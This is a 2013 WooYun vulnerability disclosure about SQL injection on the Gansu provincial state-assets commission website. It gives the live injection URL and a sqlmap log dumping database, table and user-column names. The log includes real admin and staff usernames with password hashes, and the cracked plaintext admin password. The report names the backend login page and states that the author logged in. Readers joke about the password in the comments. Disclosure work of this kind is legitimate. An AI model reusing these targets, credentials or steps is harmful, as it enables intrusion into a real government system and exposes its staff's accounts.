当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045284

漏洞标题:甘肃省国资委SQL注射漏洞可进后台

相关厂商:甘肃省国资委

漏洞作者: 雅柏菲卡

提交时间:2013-12-09 12:34

修复时间:2014-01-23 12:35

公开时间:2014-01-23 12:35

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-09: 细节已通知厂商并且等待厂商处理中
2013-12-13: 厂商已经确认,细节仅向厂商公开
2013-12-23: 细节向核心白帽子及相关领域专家公开
2014-01-02: 细节向普通白帽子公开
2014-01-12: 细节向实习白帽子公开
2014-01-23: 细节向公众公开

简要描述:

........

详细说明:

........

漏洞证明:

注入点:http://www.sasacgs.gov.cn/detail.jsp?articleId=2900
sqlmap扫描记录 如下
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[02:30:16] [INFO] fetching database names
[02:30:16] [INFO] fetching number of databases
[02:30:16] [INFO] retrieved: 7
[02:30:21] [INFO] retrieved: ltcms_cms_2009_gsgzwei
[02:32:40] [INFO] retrieved: master
[02:33:26] [INFO] retrieved: model
[02:34:04] [INFO] retrieved: msdb
[02:34:34] [INFO] retrieved: ReportServer
[02:35:58] [INFO] retrieved: ReportServerTempDB
[02:37:58] [INFO] retrieved: tempdb
available databases [7]:
[*] ltcms_cms_2009_gsgzwei
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: ltcms_cms_2009_gsgzwei
[71 tables]
+----------------------------------+
|                                  |
| dbo.D99_CMD                      |
| dbo.D99_REG                      |
| dbo.D99_Tmp                      |
| dbo.DataDown                     |
| dbo.G_FILE                       |
| dbo.G_SQMY_QZLX                  |
| dbo.G_SQMY_QZLX_FK               |
| dbo.G_ZH                         |
| dbo.LINK                         |
| dbo.LINKCLASS                    |
| dbo.LTCMS_sys_IpInfo             |
| dbo.LTCMS_sys_PointCount         |
| dbo.LTCMS_sys_RemoteInfo         |
| dbo.LTCms_E_ArticleList          |
| dbo.LTCms_E_AssociatorCount      |
| dbo.LTCms_E_ColumnList           |
| dbo.LTCms_E_ContentList          |
| dbo.LTCms_E_Course               |
| dbo.LTCms_E_DeptList             |
| dbo.LTCms_E_ExtendList           |
| dbo.LTCms_E_GrantList            |
| dbo.LTCms_E_GrantRead            |
| dbo.LTCms_E_Group                |
| dbo.LTCms_E_Info                 |
| dbo.LTCms_E_ListLcb              |
| dbo.LTCms_E_MailType             |
| dbo.LTCms_E_Question_Items       |
| dbo.LTCms_E_Questions            |
| dbo.LTCms_E_QuestionsInfo        |
| dbo.LTCms_E_Questions_review     |
| dbo.LTCms_E_RoleList             |
| dbo.LTCms_E_TempletList          |
| dbo.LTCms_E_ThreeAdress          |
| dbo.LTCms_E_UserList             |
| dbo.LTCms_E_associator           |
| dbo.LTCms_E_deptmail             |
| dbo.LTCms_E_deptmail_LC          |
| dbo.LTCms_E_joblist              |
| dbo.LTCms_E_manpowerlist         |
| dbo.LTCms_R_ClassExtend          |
| dbo.LTCms_R_GrantRole            |
| dbo.LTCms_R_RoleUser             |
| dbo.LTCms_User_desktop           |
| dbo.LTCms_User_desktop_detail    |
| dbo.LT_TR_CONTROL                |
| dbo.LT_online_talks_config       |
| dbo.LT_online_talks_image        |
| dbo.LT_online_talks_record       |
| dbo.LT_online_talks_recorddetial |
| dbo.LT_online_talks_tmpRecord    |
| dbo.LT_online_talks_tmpuserinfo  |
| dbo.LT_online_talks_userinfo     |
| dbo.LtCms_E_Advertise            |
| dbo.LtCms_E_AppList              |
| dbo.LtCms_E_ClinetIpList         |
| dbo.LtCms_E_Comment              |
| dbo.LtCms_E_IPList               |
| dbo.LtCms_O_Note                 |
| dbo.LtCms_O_VISIT_DAY            |
| dbo.LtCms_V_ColumnView           |
| dbo.NewsData                     |
| dbo.Test                         |
| dbo.VIEW_Mail                    |
| dbo.comd_list                    |
| dbo.dtproperties                 |
| dbo.kill_kk                      |
| dbo.ltcms_E_classList            |
| dbo.sqlmapoutput                 |
| dbo.t_jiaozhu                    |
| dbo.temptable                    |
+----------------------------------+
Database: ltcms_cms_2009_gsgz
Table: dbo.LTCms_E_UserList
[22 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| Address     | varchar  |
| deptid      | int      |
| Fax         | varchar  |
| fullname    | varchar  |
| grantread   | varchar  |
| id          | int      |
| Interface1  | varchar  |
| Interface2  | varchar  |
| Interface3  | varchar  |
| Interface4  | varchar  |
| Interface5  | varchar  |
| Interface6  | varchar  |
| MailAddress | varchar  |
| mid         | int      |
| orderid     | int      |
| Post        | varchar  |
| sex         | varchar  |
| state       | tinyint  |
| TEL         | varchar  |
| uLevel      | smallint |
| username    | varchar  |
| userpass    | varchar  |
+-------------+----------+
[06:34:34] [INFO] fetching number of distinct values for column 'id'
[06:34:34] [INFO] retrieved: 40
[06:34:48] [INFO] using column 'id' as a pivot for retrieving row data
[06:34:48] [INFO] retrieved: 1
[06:34:56] [INFO] retrieved: 1
[06:35:04] [INFO] retrieved: ??
[06:35:18] [INFO] retrieved: null
[06:35:42] [INFO] retrieved: 1
[06:35:50] [INFO] retrieved: null
[06:36:20] [INFO] retrieved: null
[06:36:50] [INFO] retrieved:
[06:37:01] [INFO] retrieved: 2
[06:37:11] [INFO] retrieved: null
[06:37:40] [INFO] retrieved: null
[06:38:07] [INFO] retrieved: admin
[06:38:39] [INFO] retrieved: 1e3430f52f35b54f
[06:40:04] [INFO] retrieved: 10
[06:40:18] [INFO] retrieved: null
[06:40:45] [INFO] retrieved: null
[06:41:11] [INFO] retrieved: null
[06:41:38] [INFO] retrieved: null
[06:42:04] [INFO] retrieved: null
[06:42:29] [INFO] retrieved: null
[06:42:56] [INFO] retrieved: ?????
[06:44:12] [INFO] retrieved: null
[06:44:38] [INFO] retrieved: 6
[06:44:47] [INFO] retrieved: 19
[06:45:02] [INFO] retrieved: ??
[06:45:16] [INFO] retrieved: null
[06:45:44] [INFO] retrieved: 6
[06:45:55] [INFO] retrieved: null
[06:46:25] [INFO] retrieved: null
[06:46:51] [INFO] retrieved:
[06:47:02] [INFO] retrieved: 2
[06:47:11] [INFO] retrieved: null
[06:47:38] [INFO] retrieved: null
[06:48:08] [INFO] retrieved: wangliang
[06:49:02] [INFO] retrieved: 49ba59abbe56e057
[06:50:32] [INFO] retrieved: 30
[06:50:48] [INFO] retrieved: null
[06:51:18] [INFO] retrieved: null
[06:51:47] [INFO] retrieved: null
[06:52:21] [INFO] retrieved: null
[06:53:01] [INFO] retrieved: null
[06:53:54] [INFO] retrieved: null
[06:54:27] [INFO] retrieved: wangliang
[06:55:36] [INFO] retrieved: null
[06:56:09] [INFO] retrieved: 7
[06:56:28] [INFO] retrieved: 1
[06:56:42] [INFO] retrieved: ??
[06:56:58] [INFO] retrieved: null
[06:57:30] [INFO] retrieved: 7
[06:57:42] [INFO] retrieved: null
[06:58:12] [INFO] retrieved: null
[06:58:40] [INFO] retrieved:
[06:58:54] [INFO] retrieved: 2
[06:59:08] [INFO] retrieved: null
[06:59:37] [INFO] retrieved: null
由于特殊原因不能成表   但是大致上看得出来用户名和密码
http://www.sasacgs.gov.cn/login.jsp 后台地址
系统管理员的密码解出来的是
Md5:1e3430f52f35b54f
Result: lztxjsgs
我们登陆试试看
QQ截图20131208091143.png




成功了   ...............

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-12-13 22:17

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-01-23 12:40 | 光刃 ( 普通白帽子 | Rank:200 漏洞数:24 | 萝卜白菜保平安)

    密码是:“楼主头像计算公式”?

  2. 2014-01-23 12:56 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    这个也走大厂商?

  3. 2014-01-23 13:45 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    密码是:“楼主偷学九叔灌水”?

  4. 2014-01-23 13:54 | 光刃 ( 普通白帽子 | Rank:200 漏洞数:24 | 萝卜白菜保平安)

    @袋鼠妈妈 前两个应该是“兰州”,甘肃省省会嘛

  5. 2014-08-01 18:30 | 浮生 ( 路人 | Rank:12 漏洞数:5 | 浮生偷得半日闲)

    兰州通讯技术公司